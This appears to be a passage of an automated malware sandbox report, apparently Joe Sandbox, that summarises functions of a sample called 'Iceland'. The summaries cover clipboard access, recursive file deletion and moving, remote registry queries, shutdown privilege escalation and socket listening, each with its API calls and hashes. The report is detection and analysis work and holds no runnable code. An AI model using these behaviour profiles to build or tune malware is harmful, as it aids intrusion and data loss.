                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00A9F63F
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00A9F67F
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A9F695
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000F), ref: 00A9F6A1
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00A9F6B2
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A9F6D4
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A9F6F1
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A9F72F
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00A9F750
                                                                                                                                                                                                                                                                • CountClipboardFormats.USER32 ref: 00A9F771
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00A9F7B6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 420908878-0
                                                                                                                                                                                                                                                                • Opcode ID: e38010c51366488d2cff80470977f286415ece413d32d85a3bc2bef87f5eada1
                                                                                                                                                                                                                                                                • Instruction ID: e0d6dfe7d408100b3919cbf580f78ccff602691fc12689b583c5bfdbea591701
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e38010c51366488d2cff80470977f286415ece413d32d85a3bc2bef87f5eada1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F61BF35204341AFD700EF64E994F6AB7E4AF84708F14456DF446C72A2EB31E946CB62
                                                                                                                                                                                                                                                                Function 00A973D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00A97403
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A97457
                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A97493
                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A974BA
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A974F7
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A97524
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                • Opcode ID: 8803d21e3a180ed709273e2f759ce0a2f0e7b29e4a8a4b96c36975c68f7433e2
                                                                                                                                                                                                                                                                • Instruction ID: 8bb4d1c6f3b08c7e2b5b9c1f62d950ce075cdbdb266123e24489413737533e43
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8803d21e3a180ed709273e2f759ce0a2f0e7b29e4a8a4b96c36975c68f7433e2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7D17072518354AFC700EB68D981EAFB7ECAF88704F44492DF585C7292EB74DA44CB62
                                                                                                                                                                                                                                                                Function 00A9A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A9A0A8
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00A9A0E6
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00A9A100
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00A9A118
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A123
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00A9A13F
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A9A18F
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00AE7B94), ref: 00A9A1AD
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A9A1B7
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A1C4
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A1D4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                • Opcode ID: 2e9090196863e1a382718490a4704bee864a2c60f48ba70d21a28205d2757bcc
                                                                                                                                                                                                                                                                • Instruction ID: 1788767cd92068342e202623699a778938365938088b78c830758c6ac1610ae6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e9090196863e1a382718490a4704bee864a2c60f48ba70d21a28205d2757bcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D83115327002497BDF14EFB4DC49ADE77ECAF55320F200662E815E20A1FB70DE818AA1
                                                                                                                                                                                                                                                                Function 00A94763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A94785
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A947B2
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A947E2
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A94803
                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00A94813
                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A9489A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A948A5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A948B0
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                • Opcode ID: 6b773da81481c54435bf1847f1e4ada03c0a00c42848d5ade7ecf8a21dca9e27
                                                                                                                                                                                                                                                                • Instruction ID: 9afd0ecc61c581dc1000f468cf307580e0a7cc67e6be4f4ab6d9e40214895faa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b773da81481c54435bf1847f1e4ada03c0a00c42848d5ade7ecf8a21dca9e27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87319075A0424AAADF20DBA0DC49FEB37BCEF89704F1041B6F509D6061E77096458B64
                                                                                                                                                                                                                                                                Function 00A9A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00A9A203
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00A9A25E
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A269
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00A9A285
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A9A2D5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00AE7B94), ref: 00A9A2F3
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A9A2FD
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A30A
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A9A31A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A8E3B4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                • Opcode ID: b89e962c72357a5d750114c52f953134b34ae6808f9630564ad1b81c7aa31bea
                                                                                                                                                                                                                                                                • Instruction ID: 548a757d5429e2d507267f6fcee0d3acb7520cb7cb172f38071444448689a506
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b89e962c72357a5d750114c52f953134b34ae6808f9630564ad1b81c7aa31bea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF3112356006597BCF10EFB4EC49ADE77ECAF55324F1041A2E810A70A1EB71DE868A91
                                                                                                                                                                                                                                                                Function 00AAC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC99E
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00AACA09
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AACA2D
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AACA8C
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AACB47
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AACBB4
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AACC49
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00AACC9A
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00AACD43
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AACDE2
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00AACDEF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                • Opcode ID: 191866ffed9848cd8aefd74cb0733c8713158747e3815c6b1394edca2189453a
                                                                                                                                                                                                                                                                • Instruction ID: 146c6d87514717812a3233120c52d6daae4d914a9615347548dfe808b9315554
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 191866ffed9848cd8aefd74cb0733c8713158747e3815c6b1394edca2189453a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD026171604210AFD715DF28C995E2ABBE5FF49314F1884ADF84ACB2A2DB31ED42CB51
                                                                                                                                                                                                                                                                Function 00A8D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8EAB0: GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00A8D9CD
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A8DA88
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00A8DA9B
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A8DAB8
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8DAE2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A8DAC7,?,?), ref: 00A8DB5D
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 00A8DAFE
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A8DB0F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 8a4bf4e80aa4fb16902689c1481fdd7ea587e8198e9cc2f08b4843a314f6ed75
                                                                                                                                                                                                                                                                • Instruction ID: a5a2867203174c59a0daee81ed31cc0fbe8144ed274d2c2e76ad4fbcb54fbbde
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a4bf4e80aa4fb16902689c1481fdd7ea587e8198e9cc2f08b4843a314f6ed75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33613B3184115DAFCF05FBE4DA929EDB7B5AF14340F6441A9E402771A2EB31AF09DB60
                                                                                                                                                                                                                                                                Function 00A9F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                • Opcode ID: 99c46ada36c6933e4755be82790bd2300b1d5cd75605df75b2d2c4f9054ebf48
                                                                                                                                                                                                                                                                • Instruction ID: 7314bf1ce11aabf32c2423e4816ab39cf764649557b83bdd2b5ed12dee94448c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99c46ada36c6933e4755be82790bd2300b1d5cd75605df75b2d2c4f9054ebf48
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E419A35A04611AFDB14CF59E888B55BBE4EF44318F18C5A8E8198F772DB35EC42CB90
                                                                                                                                                                                                                                                                Function 00A8F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A8205A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A82087
                                                                                                                                                                                                                                                                  • Part of subcall function 00A82010: GetLastError.KERNEL32 ref: 00A82097
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00A8F249
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                • Opcode ID: f6e7af6de37d3aeb16a71ebac50be97c886bec7e60f85dc3d62a48528f1230d7
                                                                                                                                                                                                                                                                • Instruction ID: 85a2b5a6022c5413bd2702f5a50775230f61a47be405239459cd6ea2f7ae1018
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e7af6de37d3aeb16a71ebac50be97c886bec7e60f85dc3d62a48528f1230d7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001D67A6102126FEB24B3B89D8ABFE726CAB08344F150531FD02E21E2F6605D1193A0
                                                                                                                                                                                                                                                                Function 00AA1C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AA1CD3
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1CE0
                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AA1D17
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1D22
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA1D51
                                                                                                                                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00AA1D60
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA1D6A
                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00AA1D99
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 540024437-0
